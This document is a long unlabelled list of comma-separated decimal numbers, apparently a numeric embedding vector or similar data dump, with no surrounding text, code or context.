0.026450881734490395, -0.007171679753810167, -0.009008727967739105, -0.0228160098195076, 0.04288625344634056, -0.002745766192674637, 0.030621830374002457, 0.010518900118768215, -0.006570226512849331, -0.009767082519829273, 0.0023829329293221235, -0.00345508917234838, -0.01495788898319006, -0.026803908869624138, 0.004167681094259024, 0.017912855371832848, 0.022685259580612183, -0.00991090852767229, 0.009394442662596703, 0.007975797168910503, -0.01792593114078045, 0.0037427409552037716, 0.03470125421881676, -0.009525193832814693, 0.014683311805129051, 0.00872761383652687, 0.018056681379675865, -0.0029451611917465925, -0.017703654244542122, 0.013964182697236538, 0.006674827076494694, -0.019861042499542236, 0.032478492707014084, 0.02340438775718212, -0.011329554952681065, 0.018723510205745697, -0.015271690674126148, 0.030098827555775642, 0.016095420345664024, -0.0006194317829795182, 0.0326092429459095, 0.0010648015886545181, -0.034439753741025925, 0.014081858098506927, 0.0008077946258708835, 0.008773377165198326, -0.0199787188321352, 0.006230274215340614, -0.03409980237483978, 0.023169036954641342, 0.006096255034208298, -0.013186215423047543, 0.021155474707484245, 0.01680147461593151, -0.01499711349606514, 0.003772159805521369, 0.007897347211837769, -0.004311506636440754, -0.03645331412553787, -0.032975345849990845, -0.013343116268515587, -0.0014447961002588272, 0.006766352336853743, 0.005419619381427765, -0.023038286715745926, 0.016749173402786255, 0.011061515659093857, -0.02004409395158291, 0.01246708631515503, 0.01759905368089676, 0.0050306362099945545, -0.0000329941394738853, 0.01655304804444313, -0.0011301770573481917, -0.026764683425426483, -0.0017733073327690363, 0.018448933959007263, -0.00691017834469676, 0.03496275842189789, 0.00942059326916933, 0.016252322122454643, 0.02983732707798481, 0.02639858052134514, -0.026267830282449722, -0.0006361842388287187, 0.012192510068416595, -0.005279062315821648, -0.015585492365062237, 0.015559341758489609, 0.00439976342022419, 0.0071128420531749725, 0.011721806600689888, 0.013807281851768494, -0.007616232614964247, -0.0009896198753267527, 0.019207289442420006, -0.007465869188308716, 0.012133671902120113, -0.01932496391236782, -0.004742984194308519, 0.02430656924843788, -0.0497375950217247, 0.0028062385972589254, -0.008544563315808773, -0.008041172288358212, 0.0019808742217719555, -0.005684389732778072, -0.01080001424998045, -0.014487185515463352, 0.0026444343384355307, 0.028268316760659218, 0.025470251217484474, 0.027013109996914864, -0.004311506636440754, 0.009008727967739105, 0.008041172288358212, 0.0224237572401762, 0.0027277879416942596, 0.003232812974601984, -0.01694530062377453, 0.02005716785788536, 0.0000799827030277811, 0.009590568952262402, 0.0014366240939125419, -0.018566610291600227, 0.01687992550432682, 0.02324748784303665, -0.0035956462379544973, 0.004641652572900057, -0.01932496391236782, 0.01561164204031229, -0.004700490273535252, 0.02233223244547844, -0.003504120744764805, 0.011832945048809052, 0.009211392141878605, 0.022632958367466927, -0.0015346872387453914, 0.010322773829102516, 0.011682582087814808, -0.011002677492797375, 0.017834406346082687, -0.005798796657472849, 0.015925444662570953, 0.008583788760006428, 0.008511875756084919, 0.021050874143838882, 0.06098216027021408, -0.006714052055031061, -0.010126647539436817, 0.010943839326500893, 0.004756059497594833, -0.005373856984078884, 0.003432207740843296, 0.019298814237117767, 0.005877247080206871, -0.028242167085409164, 0.0007685694145038724, -0.0015183433424681425, 0.002997461473569274, 0.007930034771561623, 0.001275637187063694, -0.0211947001516819, -0.0041055744513869286, 0.005249643698334694, 0.0016817818395793438, 0.05559523031115532, 0.029235873371362686, 0.02649010717868805, 0.005076398607343435, -0.015598567202687263, -0.00038694057730026543, 0.014081858098506927, -0.004546858370304108, -0.012872413732111454, 0.004680877551436424, 0.009231004863977432, 0.011355704627931118, 0.004886810202151537, -0.020017944276332855, -0.008544563315808773, -0.009923983365297318, 0.0020593246445059776, -0.01401648297905922, -0.0011220050510019064, 0.02208380587399006, -0.006364293862134218, -0.019534165039658546, -0.005628820974379778, -0.0026771221309900284, -0.01745522767305374, 0.005749765317887068, 0.0005021647084504366, -0.009675557725131512, -0.010786938481032848, -0.0063054561614990234, -0.012918176129460335, 0.01146030519157648, 0.008152310736477375, 0.00830921158194542, -0.01165643148124218, -0.000660700025036931, -0.01703682541847229, 0.0068840282037854195, -0.012002920731902122, 0.0216000284999609, -0.00966248195618391, 0.018566610291600227, 0.019586466252803802, 0.006524463649839163, 0.015507041476666927, -0.00607337336987257, -0.0002643617335706949, 0.006740202195942402, 0.007616232614964247, -0.008995653130114079, 0.01022471021860838, 0.004452063702046871, -0.01214674673974514, -0.005520951468497515, 0.020501721650362015, 0.017389852553606033, 0.03718551993370056, 0.002830754267051816, 0.006177973933517933, -0.006818653084337711, -0.008583788760006428, 0.00309879332780838, 0.02624168060719967, 0.004458601586520672, 0.011728344485163689, 0.008917203173041344, 0.022149180993437767, 0.017873629927635193, -0.011349166743457317, 0.010139722377061844, -0.008518412709236145, -0.009917446412146091, -0.016984526067972183, 0.01561164204031229, -0.0021132593974471092, -0.02094627358019352, 0.0158992949873209, 0.013676530681550503, -0.025561776012182236, 0.019677991047501564, -0.01319929026067257, 0.009106791578233242, 0.024162743240594864, 0.001743888482451439, 0.003906179452314973, 0.005998191889375448, 0.015467816963791847, -0.02446346916258335, 0.0017847480485215783, 0.018958862870931625, 0.008126161061227322, -0.007465869188308716, -0.023522064089775085, 0.004997948184609413, 0.026620857417583466, -0.012826651334762573, 0.010466599836945534, 0.0010092324810102582, -0.016252322122454643, 0.028660569339990616, 0.007054004352539778, -0.0015363215934485197, -0.017638279125094414, 0.0154939666390419, 0.003873491659760475, -0.003131481120362878, 0.01451333612203598, -0.0006737750954926014, -0.02354821376502514, 0.011872170493006706, 0.01480098720639944, 0.006455819588154554, -0.004762596916407347, -0.005194074474275112, -0.004491289146244526, -0.0015060855075716972, -0.006037416867911816, -0.005769378039985895, 0.015637792646884918, -0.0016915880842134356, 0.007152067497372627, -0.015716243535280228, 0.01165643148124218, 0.006844803225249052, -0.006053760647773743, -0.02044942043721676, 0.004412838723510504, -0.006063567008823156, 0.0026738534215837717, 0.0015453107189387083, 0.0005417985375970602, 0.016003895550966263, 0.01178718265146017, 0.0042265187948942184, -0.0016850505489856005, -0.001175122568383813, 0.0013892269926145673, -0.0028879577293992043, 0.00985860824584961, 0.004720102995634079, 0.005543832667171955, -0.0022260318510234356, -0.009440205991268158, 0.006498313508927822, -0.0038146537262946367, 0.0007375160930678248, -0.0031298466492444277, 0.01565086841583252, -0.007420106325298548, -0.0014358069747686386, -0.005416350904852152, -0.0074593317694962025, -0.0059753102250397205, -0.006230274215340614, 0.00250714598223567, 0.02175692841410637, -0.0034289390314370394, -0.017651354894042015, -0.016278471797704697, 0.001940014655701816, -0.010335848666727543, 0.012185972183942795, -0.021887678653001785, -0.035171959549188614, 0.006792502477765083, 0.004017317667603493, 0.004955454263836145, -0.0014921932015568018, 0.018318183720111847, 0.01613464578986168, 0.013388879597187042, -0.011682582087814808, -0.0038211913779377937, 0.0008155579562298954, 0.015755468979477882, 0.05277101323008537, 0.006805577781051397, -0.0027931632939726114, 0.0028618075884878635, 0.012604374438524246, -0.0033079946879297495, -0.00018162099877372384, -0.0037362033035606146, -0.006181242875754833, 0.016448447480797768, 0.010093959979712963, -0.007727370597422123, 0.006772890221327543, -0.0005381211522035301, 0.0073089683428406715, 0.018945787101984024, -0.020357895642518997, -0.01759905368089676, 0.022619884461164474, 0.015297840349376202, 0.004040198866277933, -0.013016239739954472, 0.0012421323917806149, -0.0010852314298972487, 0.016369996592402458, 0.0035629586782306433, 0.008570712991058826, -0.005151580553501844, -0.0017569635529071093, -0.00016231482732109725, 0.0032785756047815084, 0.01647459715604782, -0.011865632608532906, 0.0034583578817546368, 0.003683903021737933, -0.003231178503483534, -0.0069167157635092735, 0.025574851781129837, -0.022763710469007492, -0.009015265852212906, -0.0008727614185772836, -0.004216712433844805, 0.012780888006091118, -0.0019105956889688969, 0.021626178175210953, -0.006099523510783911, 0.008825677447021008, -0.003497583093121648, -0.010375074110925198, -0.007001704070717096, 0.005723615176975727, -0.03375985100865364, 0.005697465036064386, 0.017259102314710617, 0.009551344439387321, 0.022724485024809837, 0.0005859269294887781, 0.001676878659054637, -0.0154939666390419, -0.003739472245797515, -0.006714052055031061, 0.00178311369381845, 0.019756441935896873, 0.015637792646884918, -0.0029941927641630173, 0.0023927390575408936, 0.02273755893111229, -0.006292380858212709, 0.002652606228366494, -0.0030056333635002375, 0.017089126631617546, 0.015167090110480785, -0.004432451445609331, 0.014500261284410954, 0.01646152324974537, 0.002758841263130307, -0.0018877142574638128, 0.011277254670858383, -0.00937483087182045, 0.00868838932365179, 0.00806732289493084, 0.018161281943321228, 0.00309879332780838, -0.028111416846513748, 0.021456202492117882, -0.01451333612203598, -0.0017226414056494832, -0.0028209479060024023, -0.01116611622273922, -0.04100344330072403, -0.0028879577293992043, 0.005664777476340532, -0.02486879751086235, -0.004664533771574497, 0.018396634608507156, 0.006066835951060057, -0.010826163925230503, 0.013114302419126034, -0.00065497966716066, -0.0037525473162531853, 0.01826588250696659, 0.016513822600245476, -0.01234941091388464, 0.005687658675014973, 0.02324748784303665, -0.0019874118734151125, -0.0010067810071632266, 0.004141530953347683, -0.0067009772174060345, -0.00004514987813308835, 0.0025316618848592043, 0.02329978719353676, 0.01566394232213497, -0.003203393891453743, -0.008145772852003574, -0.018318183720111847, -0.006988628767430782, 0.021469276398420334, -0.013519629836082458, -0.008015022613108158, -0.021011648699641228, -0.014657162129878998, 0.01867121085524559, 0.013192753307521343, 0.03457050397992134, -0.009021803736686707, 0.0334198996424675, 0.0046220398508012295, -0.00002291969212819822, 0.020684773102402687, 0.006325068883597851, 0.0014799353666603565, -0.03352449834346771, -0.014081858098506927, 0.035171959549188614, 0.009584031999111176, 0.007335118483752012, 0.00619431771337986, -0.020253295078873634, -0.015546266920864582, -0.020423270761966705, -0.021874604746699333, -0.011231491342186928, 0.021299300715327263, 0.00029173766961321235, 0.00774698331952095, 0.008721076883375645, 0.014591786079108715, -0.006403519306331873, -0.0002700820623431355, 0.013532704673707485, -0.017219876870512962, 0.0035466146655380726, -0.0014284522039815784, -0.0032556941732764244, -0.013231978751718998, -0.012865875847637653, -0.02054094709455967, -0.0004907239926978946, 0.03676711767911911, -0.023273637518286705, -0.014291059225797653, 0.0187365859746933, 0.007210905198007822, -0.012460548430681229, -0.010695413686335087, 0.008734151721000671, 0.002749035134911537, -0.0072632054798305035, 0.001238046446815133, 0.018148208037018776, -0.0016915880842134356, -0.002557812025770545, 0.029549675062298775, 0.026293979957699776, -0.023613588884472847, 0.013258128426969051, 0.014212609268724918, -0.01259129960089922, 0.018462009727954865, 0.009819382801651955, 0.0012682825326919556, 0.00178311369381845, -0.020083319395780563, 0.0023371700663119555, 0.001103209680877626, 0.0015967938816174865, -0.008296136744320393, -0.004219981376081705, 0.01924651302397251, -0.005158117972314358, 0.013689606450498104, 0.025954028591513634, -0.011486455798149109, 0.008472650311887264, -0.0023943735286593437, 0.006112598814070225, -0.014918663538992405, 0.0011734882136806846, 0.013885731808841228, -0.013859582133591175, 0.03579956293106079, 0.0008711270056664944, -0.006818653084337711, 0.008877977728843689, -0.002847098046913743, 0.005690927617251873, -0.014814062975347042, 0.017991306260228157, -0.0035694960970431566, 0.013807281851768494, -0.004314775578677654, 0.028791319578886032, 0.003337413538247347, -0.004569739568978548, -0.009041416458785534, -0.0046056960709393024, 0.012977014295756817, -0.01914191246032715, -0.010407761670649052, 0.03187703713774681, -0.0027375943027436733, 0.015428591519594193, 0.0010312966769561172, 0.007472406607121229, 0.011421079747378826, -0.0017798448679968715, -0.008093472570180893, -0.032478492707014084, -0.0005013474728912115, -0.005932816304266453, -0.018971936777234077, -0.005873978603631258, 0.028843620792031288, -0.0017406196566298604, 0.005024098325520754, 0.004419376142323017, 0.00238456716760993, 0.00476913433521986, 0.0033962512388825417, -0.0005356695619411767, -0.004916229285299778, 0.0032017596531659365, -0.008864902891218662, 0.0017226414056494832, -0.008250373415648937, 0.02184845507144928, 0.010891539044678211, 0.02094627358019352, 0.012996627017855644, 0.011695656925439835, -0.028346767649054527, -0.009995896369218826, -0.004458601586520672, 0.02683005854487419, -0.01495788898319006, 0.019442640244960785, -0.004324581939727068, -0.022358382120728493, 0.014277984388172626, 0.007099767215549946, -0.0018828111933544278, -0.002229300793260336, -0.0067009772174060345, -0.00867531355470419, 0.019769517704844475, 0.007014778908342123, -0.009793233126401901, -0.0022096880711615086, -0.013911882415413857, -0.01899808831512928, -0.03287074342370033, -0.004916229285299778, -0.022476058453321457, 0.016683798283338547, 0.016814550384879112, -0.008119623176753521, -0.007799283601343632, -0.02177000418305397, 0.013624230399727821, -0.011139965616166592, -0.017298327758908272, -0.0071259173564612865, -0.0069297910667955875, -0.006164899095892906, -0.005619014613330364, -0.0046056960709393024, 0.015703167766332626, 0.021953055635094643, 0.011604131199419498, 0.0027997009456157684, -0.02666008286178112, 0.018854262307286263, 0.0023600514978170395, -0.01946878992021084, -0.018788885325193405, 0.005749765317887068, 0.009682094678282738, 0.012120597064495087, -0.0018991549732163548, -0.024921096861362457, -0.01011357270181179, -0.010760788805782795, 0.010440449230372906, -0.00740049360319972, -0.00774698331952095, -0.0035727648064494133, 0.01345425471663475, 0.029157422482967377, 0.005262718535959721, -0.03041262924671173, 0.0187365859746933, -0.036165665835142136, -0.006168167572468519, 0.00654080742970109, -0.002948429901152849, 0.0067467400804162025, 0.009754007682204247, -0.005056786350905895, -0.0033439509570598602, 0.0018403171561658382, -0.013271203264594078, 0.003487776964902878, -0.013016239739954472, -0.014291059225797653, 0.022031504660844803, -0.00226362282410264, 0.007635845337063074, -0.016016969457268715, -0.03334144875407219, -0.010080884210765362, -0.005674583371728659, -0.007197829894721508, -0.019691066816449165, 0.0037656223867088556, -0.01939033903181553, 0.017232952639460564, -0.006547344848513603, -0.01146030519157648, -0.008976040408015251, 0.01480098720639944, 0.016971450299024582, -0.005887053441256285, 0.004474945366382599, -0.027980664744973183, -0.016448447480797768, -0.020972423255443573, 0.006844803225249052, -0.03219084069132805, 0.005838022101670504, -0.010061272419989109, -0.014984038658440113, 0.024751121178269386, -0.000014390246178663801, -0.01345425471663475, -0.023260563611984253, -0.012140209786593914, 0.020671697333455086, 0.020671697333455086, -0.0033864451106637716, 0.0002267708769068122, 0.00607337336987257, -0.020828599110245705, 0.0030399553943425417, 0.002886323258280754, 0.0008539659902453423, 0.019625691697001457, -0.0059753102250397205, 0.014905588701367378, 0.003559689735993743, -0.006779427640140057, 0.0031069652177393436, -0.000038918784412089735, 0.0032230066135525703, 0.006890565622597933, -0.004958723206073046, -0.029654275625944138, -0.004903153982013464, 0.026463957503437996, -0.02860826998949051, -0.020174844190478325, 0.011623743921518326, -0.0028503669891506433, 0.003205028362572193, -0.027039259672164917, -0.006115867290645838, 0.006658483296632767, -0.007407031487673521, 0.0010844141943380237, -0.005932816304266453, -0.0027735508047044277, 0.02046249620616436, 0.004569739568978548, 0.014617936685681343, -0.02013561874628067, -0.020266370847821236, -0.006233543157577515, 0.016984526067972183, 0.004072886426001787, -0.02446346916258335, 0.00806732289493084, 0.0171152763068676, -0.016644572839140892, -0.002585596637800336, -0.024672670289874077, -0.0016564488178119063, -0.0001905079698190093, 0.0034747018944472075, 0.02193997986614704, -0.019442640244960785, -0.018122056499123573, 0.017873629927635193, 0.0167230237275362, 0.035982612520456314, -0.003984629642218351, -0.0057040024548769, -0.011604131199419498, -0.009904371574521065, -0.006969016045331955, -0.018854262307286263, 0.005449038464576006, -0.015546266920864582, 0.0076750703155994415, 0.0010901346104219556, 0.026633933186531067, -0.016892999410629272, 0.0014080223627388477, 0.020083319395780563, 0.018043607473373413, 0.0013794206315651536, 0.0037688910961151123, 0.009812845848500729, -0.019952567294239998, 0.006004729308187962, 0.00369044067338109, 0.0005021647084504366, -0.006792502477765083, -0.023862015455961227, -0.015167090110480785, -0.020593246445059776, -0.01091768965125084, -0.0018092638347297907, 0.008877977728843689, 0.006818653084337711, 0.0007518169586546719, -0.007054004352539778, -0.02020099386572838, -0.017755955457687378, -0.01333657931536436, -0.003549883607774973, -0.0012789060128852725, 0.003739472245797515, 0.010133185423910618, 0.0067009772174060345, -0.01647459715604782, 0.007930034771561623, -0.02552255056798458, 0.0012993358541280031, 0.01259783748537302, 0.002936989301815629, -0.035590361803770065, -0.00973439496010542, -0.015271690674126148, 0.019612615928053856, -0.000799622677732259, 0.01988719217479229, 0.00607664231210947, 0.004507632926106453, -0.004952185787260532, 0.0051809996366500854, 0.010937302373349667, -0.021874604746699333, 0.024881871417164803, -0.011623743921518326, 0.008642625994980335, 0.005187537055462599, 0.005550370551645756, 0.002157387789338827, 0.0021753660403192043, 0.011800257489085197, 0.0033962512388825417, -0.006566957570612431, 0.009976283647119999, -0.00509274285286665, -0.004827972501516342, 0.010329310782253742, -0.022946760058403015, 0.01566394232213497, 0.011832945048809052, 0.004896616563200951, -0.01622617058455944, 0.011591056361794472, 0.007577007170766592, -0.018553534522652626, 0.004880272783339024, -0.005321556702256203, 0.005641895812004805, 0.004919497761875391, -0.002363320207223296, 0.01843586005270481, -0.0019759710412472486, -0.005187537055462599, -0.0034452828112989664, -0.0007918593473732471, 0.011957158334553242, 0.0002157387789338827, 0.009727858006954193, -0.031170984730124474, -0.008028097450733185, 0.016814550384879112, -0.012369023635983467, 0.00811308529227972, -0.000766117824241519, 0.0012404979206621647, -0.0030791808385401964, -0.005873978603631258, 0.04555356875061989, -0.01157798059284687, 0.01495788898319006, -0.01226442214101553, -0.01923343911767006, 0.010218173265457153, 0.003105330979451537, 0.005350975319743156, 0.00585109693929553, -0.027823764830827713, 0.001253572991117835, 0.013558855280280113, 0.000429025967605412, 0.03417825326323509, -0.02837291732430458, -0.004102305509150028, 0.0007800100720487535, 0.006370831280946732, -0.009923983365297318, -0.017638279125094414, -0.02273755893111229, -0.0269085094332695, 0.022057656198740005, 0.0032802100758999586, -0.00047070279833860695, -0.006524463649839163, 0.005965503863990307, 0.030308028683066368, -0.028922071680426598, 0.009773620404303074, 0.018566610291600227, -0.015467816963791847, 0.01614771969616413, 0.03122328408062458, -0.0040303925052285194, 0.010937302373349667, 0.000473562948172912, -0.008845290169119835, -0.020907048135995865, -0.017703654244542122, 0.008335362188518047, -0.0014104739530012012, 0.0046547274105250835, -0.006851340644061565, 0.020161768421530724, 0.0042559378780424595, -0.0026509719900786877, -0.000010751186891866382, 0.0009896198753267527, -0.0022309350315481424, -0.014356435276567936, 0.030464930459856987, -0.014735612086951733, 0.009329067543148994, 0.011054977774620056, 0.019037311896681786, -0.002992558293044567, -0.004566470626741648, -0.005475188605487347, 0.010361999273300171, -0.01246708631515503, -0.02519567497074604, -0.005275793839246035, -0.0029043015092611313, 0.017389852553606033, -0.006240080576390028, 0.0016139548970386386, 0.014029557816684246, -0.01694530062377453, 0.023339012637734413, -0.016513822600245476, 0.009727858006954193, 0.022541433572769165, -0.0016646208241581917, 0.014304134994745255, 0.017023751512169838, -0.0017373509472236037, -0.003053030464798212, 0.00937483087182045, 0.012159821577370167, -0.0025431024841964245, 0.0009177069878205657, 0.0017079319804906845, -0.016749173402786255, -0.0012290573213249445, 0.015297840349376202, -0.00949904415756464, -0.0023093854542821646, 0.014827137812972069, -0.001532235648483038, 0.0021753660403192043, -0.009309454821050167, 0.007818896323442459, 0.015376291237771511, 0.009610181674361229, 0.016696874052286148, -0.006511388346552849, -0.013173140585422516, -0.02639858052134514, -0.0015183433424681425, 0.009348680265247822, -0.008838752284646034, -0.00819153618067503, 0.0008613207028247416, -0.023012137040495872, 0.0012274228502064943, -0.01059735007584095, -0.00010383449989603832, -0.01990026794373989, 0.004233056213706732, 0.02837291732430458, 0.012133671902120113, 0.0023371700663119555, -0.03980053588747978, -0.01907653734087944, 0.006995166186243296, 0.0015649233246222138, 0.012421323917806149, -0.003896373091265559, -0.011761032044887543, 0.00032381247729063034, 0.002551274374127388, -0.005400007124990225, 0.013271203264594078, -0.023339012637734413, -0.0101854857057333, 0.006857878062874079, 0.005452307406812906, 0.000897277204785496, 0.008538025431334972, -0.01939033903181553, -0.019756441935896873, -0.021456202492117882, -0.0008572347578592598, 0.011440692469477654, 0.010061272419989109, 0.014474110677838326, -0.013951107859611511, 0.01389880757778883, -0.012342873029410839, 0.007184755057096481, -0.008466112427413464, -0.034936606884002686, -0.0014611398801207542, 0.0014970963820815086, 0.014500261284410954, -0.002234203740954399, 0.0012584761716425419, 0.015167090110480785, 0.00949904415756464, 0.029445074498653412, 0.004141530953347683, 0.019939493387937546, -0.022646034136414528, 0.006063567008823156, 0.00037509127287194133, 0.01949493959546089, -0.004716834053397179, -0.001750426017679274, 0.008629551157355309, 0.02934047393500805, 0.0006995166186243296, -0.00011430477752583101, -0.01295740157365799, 0.022476058453321457, -0.03807462379336357, 0.0028176791965961456, 0.007439719047397375, 0.005069861188530922, 0.01932496391236782, 0.0020756684243679047, -0.016121570020914078, 0.007923496887087822, 0.012970476411283016, -0.018684284761548042, -0.020070243626832962, -0.0009340508258901536, -0.02429349347949028, 0.0016245783772319555, -0.018540460616350174, 0.007701220456510782, -0.014984038658440113, 0.01963876560330391, 0.007269742898643017, -0.0211947001516819, 0.006341412663459778, 0.00462530879303813, 0.006638870574533939, 0.012015996500849724, -0.022842159494757652, 0.007577007170766592, -0.004000973887741566, 0.015860069543123245, -0.014212609268724918, -0.012199047021567822, 0.019128838554024696, 0.038362275809049606, -0.011323017068207264, 0.015507041476666927, -0.015533192083239555, -0.009479431435465813, -0.01561164204031229, 0.0006361842388287187, 0.000493175582960248, -0.00185012340079993, 0.015114789828658104, -0.012630525045096874, -0.01532399095594883, 0.032975345849990845, -0.017991306260228157, 0.00847918726503849, -0.008734151721000671, 0.017416002228856087, 0.0038146537262946367, -0.007452794350683689, 0.025326425209641457, 0.006580032873898745, -0.011192265897989273, -0.0022358382120728493, 0.008551100268959999, -0.0026068435981869698, 0.001833779620938003, -0.031510937958955765, -0.02479034662246704, 0.01842278428375721, 0.013741906732320786, 0.010728101246058941, 0.004229787737131119, -0.02787606418132782, -0.012905101291835308, -0.006864415481686592, 0.010433911345899105, -0.0033733700402081013, 0.008100010454654694, 0.003948673605918884, 0.004906422924250364, 0.0256663765758276, -0.023169036954641342, -0.011695656925439835, 0.021626178175210953, 0.0020658622961491346, -0.010669263079762459, 0.009891295805573463, -0.013977257534861565, 0.02331286296248436, 0.02584942802786827, -0.015010189265012741, 0.02005716785788536, 0.022136105224490166, -0.019364189356565475, 0.0040924991481006145, -0.004429182503372431, 0.01898501254618168, 0.01059735007584095, -0.0001979648368433118, 0.01923343911767006, 0.023169036954641342, -0.01128379162400961, 0.004720102995634079, 0.0009160726331174374, -0.014774837531149387, 0.02323441207408905, -0.018043607473373413, -0.02063247188925743, -0.007243592757731676, -0.0020266370847821236, 0.005517682526260614, 0.004697221331298351, 0.02632013149559498, -0.043984562158584595, 0.010741176083683968, -0.018122056499123573, 0.011741419322788715, 0.011682582087814808, -0.012813575565814972, 0.011728344485163689, -0.006524463649839163, 0.012480161152780056, -0.0037688910961151123, 0.0052300309762358665, -0.02600632980465889, -0.004814897198230028, 0.0014251834945753217, -0.005328094121068716, -0.020187919959425926, 0.00043106896919198334, 0.0037362033035606146, 0.008714538998901844, 0.004452063702046871, 0.002981117693707347, 0.007361268624663353, -0.013173140585422516, 0.012754738330841064, 0.02275063470005989, -0.01720680110156536, 0.010263935662806034, -0.01988719217479229, -0.008485725149512291, -0.0034125952515751123, -0.017952080816030502, 0.009034878574311733, 0.0012895294930785894, 0.008956427685916424, -0.009577494114637375, -0.021743854507803917, 0.011963696219027042, 0.014474110677838326, 0.011126890778541565, -0.006177973933517933, -0.00831574946641922, -0.019756441935896873, 0.026686232537031174, -0.0015567514346912503, -0.018631985411047935, -0.014134158380329609, 0.009937059134244919, -0.005089473910629749, -0.016016969457268715, -0.012807038612663746, 0.0033864451106637716, -0.005468651186674833, -0.01319929026067257, -0.024084292352199554, -0.005060054827481508, 0.012748200446367264, -0.0033962512388825417, -0.017664428800344467, -0.00439976342022419, 0.004631846211850643, 0.013624230399727821, 0.0053640506230294704, 0.01762520521879196, -0.013964182697236538, -0.010806551203131676, 0.03514580801129341, 0.0009111694525927305, 0.00936829298734665, 0.004170949570834637, 0.0014178287237882614, 0.002659143880009651, 0.012401711195707321, 0.03885912895202637, 0.00013310019858181477, -0.006962478626519442, -0.027326911687850952, -0.007465869188308716, 0.013277741149067879, -0.0016621692338958383, -0.012055221013724804, 0.01825280860066414, -0.008407275192439556, 0.012342873029410839, 0.015206314623355865, 0.005916472524404526, -0.0015673749148845673, 0.0042592063546180725, -0.004556664265692234, -0.013146989978849888, -0.0004837778687942773, 0.011133428663015366, -0.015938518568873405, -0.01476176269352436, -0.003031783504411578, -0.01320582814514637, 0.0076423827558755875, 0.01010703481733799, 0.01736370287835598, -0.008649163879454136, -0.004367075860500336, -0.028895920142531395, -0.014526410959661007, -0.00019908847752958536, -0.014330284669995308, -0.011676044203341007, -0.012983552180230618, 0.015912368893623352, 0.0014946447918191552, 0.023665890097618103, -0.014774837531149387, 0.0020871092565357685, 0.027666863054037094, 0.020240219309926033, 0.003165803151205182, 0.009610181674361229, -0.010610424913465977, 0.00005184063775232062, 0.00631853099912405, -0.003298188326880336, -0.009139479137957096, -0.005991654004901648, -0.004285356495529413, -0.002552908845245838, 0.00029807089595124125, 0.00678596505895257, -0.016696874052286148, 0.0036642905324697495, 0.0015902563463896513, -0.03470125421881676, -0.021390827372670174, 0.022593732923269272, 0.022136105224490166, 0.00008115741366054863, -0.010531974956393242, 0.018226657062768936, -0.023456688970327377, 0.01463101152330637, -0.0002909204631578177, 0.015337065793573856, 0.006890565622597933, 0.0013401954201981425, 0.007099767215549946, 0.015154014341533184, 0.008400737307965755, 0.0014055707724764943, -0.000696247851010412, -0.003945404663681984, 0.02150850184261799, -0.019194213673472404, 0.0013973988825455308, 0.0019302082946524024, -0.003187050111591816, -0.01316006574779749, 0.015428591519594193, 0.005779184401035309, -0.0024548457004129887, -0.0032360816840082407, 0.00654080742970109, 0.007047466933727264, -0.00654407637193799, 0.008819139562547207, -0.000958566612098366, -0.00040798328700475395, 0.013846507295966148, -0.0035760337486863136, -0.0154939666390419, 0.004249399993568659, 0.01899808831512928, -0.006151823792606592, 0.0018043606542050838, 0.013349654152989388, 0.007786208763718605, -0.028425218537449837, -0.002118162577971816, 0.021717702969908714, -0.008283061906695366, -0.037133220583200455, -0.029000522568821907, 0.012702438049018383, -0.017873629927635193, 0.011983308009803295, 0.010080884210765362, 0.009682094678282738, -0.012728587724268436, -0.0011457036016508937, -0.02044942043721676, 0.007054004352539778, 0.013120840303599834, -0.01480098720639944, 0.007916959002614021, -0.00037713427445851266, -0.010564662516117096, -0.0012086274800822139, -0.009714782238006592, 0.033707547932863235, -0.012342873029410839, -0.004295162856578827, 0.001748791546560824, -0.026215530931949615, -0.01574239321053028, -0.0015665576793253422, 0.006838265340775251, -0.004347463138401508, 0.0002494479704182595, 0.011309942230582237, 0.007923496887087822, -0.011944083496928215, 0.026882359758019447, 0.02201843075454235, 0.011728344485163689, -0.005105817690491676, -0.006040685810148716, -0.00644274428486824, -0.008538025431334972, -0.034936606884002686, -0.01210098434239626, 0.021796153858304024, 0.030360329896211624, 0.012009458616375923, 0.0236528143286705, 0.027666863054037094, 0.00904795341193676, 0.01817435771226883, -0.005305212456732988, 0.016356922686100006, -0.0038015786558389664, -0.003527002176269889, 0.008551100268959999, 0.005011023487895727, -0.006164899095892906, -0.0030840837862342596, 0.00872761383652687, 0.0026934659108519554, 0.02013561874628067, 0.022123031318187714, 0.00440303236246109, 0.016853773966431618, -0.02552255056798458, -0.014670236967504025, 0.0028961296193301678, 0.011113815940916538, -0.005494801327586174, -0.015232465229928493, -0.013611155562102795, 0.0004911326104775071, 0.029131272807717323, 0.03203393891453743, -0.013401954434812069, -0.011094203218817711, -0.00644274428486824, -0.015337065793573856, -0.008877977728843689, 0.003048127517104149, 0.02918357215821743, 0.010139722377061844, 0.020763222128152847, -0.0007199464598670602, -0.012316723354160786, 0.004968529567122459, -0.000875213008839637, -0.006276037078350782, 0.016997599974274635, 0.007335118483752012, 0.0015330527676269412, -0.014199534431099892, -0.011251104064285755, -0.004373613279312849, -0.02664700709283352, 0.01582084409892559, -0.01071502547711134, 0.004739715717732906, 0.005615745671093464, -0.010486211627721786, -0.03472740575671196, -0.01916806399822235, 0.014369510114192963, -0.01202253345400095, -0.015049413777887821, -0.0031167715787887573, -0.008263449184596539, -0.014787912368774414, 0.003520464524626732, -0.04215405136346817, -0.015520117245614529, -0.005223493557423353, 0.0034648955333977938, -0.03634871542453766, 0.01655304804444313, -0.02756226249039173, 0.011944083496928215, -0.00912640430033207, -0.007106304634362459, -0.007635845337063074, -0.004066349007189274, -0.006383906584233046, -0.017952080816030502, -0.005243105813860893, 0.005432694684714079, -0.02493417263031006, -0.00010179152013733983, -0.014134158380329609, 0.010022046975791454, 0.008511875756084919, 0.014657162129878998, 0.016644572839140892, -0.02161310240626335, -0.003997704945504665, 0.026620857417583466, 0.00582494679838419, -0.005586326587945223, 0.004262475296854973, -0.00762277003377676, 0.003739472245797515, -0.01703682541847229, 0.008054248057305813, 0.004935841541737318, -0.00161068607121706, -0.0050469799898564816, -0.005099280271679163, 0.0005789807764813304, -0.002868345007300377, -0.003549883607774973, 0.006870953366160393, -0.021247001364827156, 0.007413568906486034, -0.007027854211628437, 0.0024924366734921932, -0.02486879751086235, 0.026777759194374084, 0.015376291237771511, -0.006210661958903074, -0.007655457593500614, -0.02044942043721676, 0.010741176083683968, 0.00892374012619257, 0.019298814237117767, -0.007563932333141565, -0.00843996275216341, -0.0183574091643095, 0.010858851484954357, 0.024228118360042572, 0.013075076974928379, -0.008531487546861172, -0.01524554006755352, 0.0002880603133235127, -0.0085641760379076, 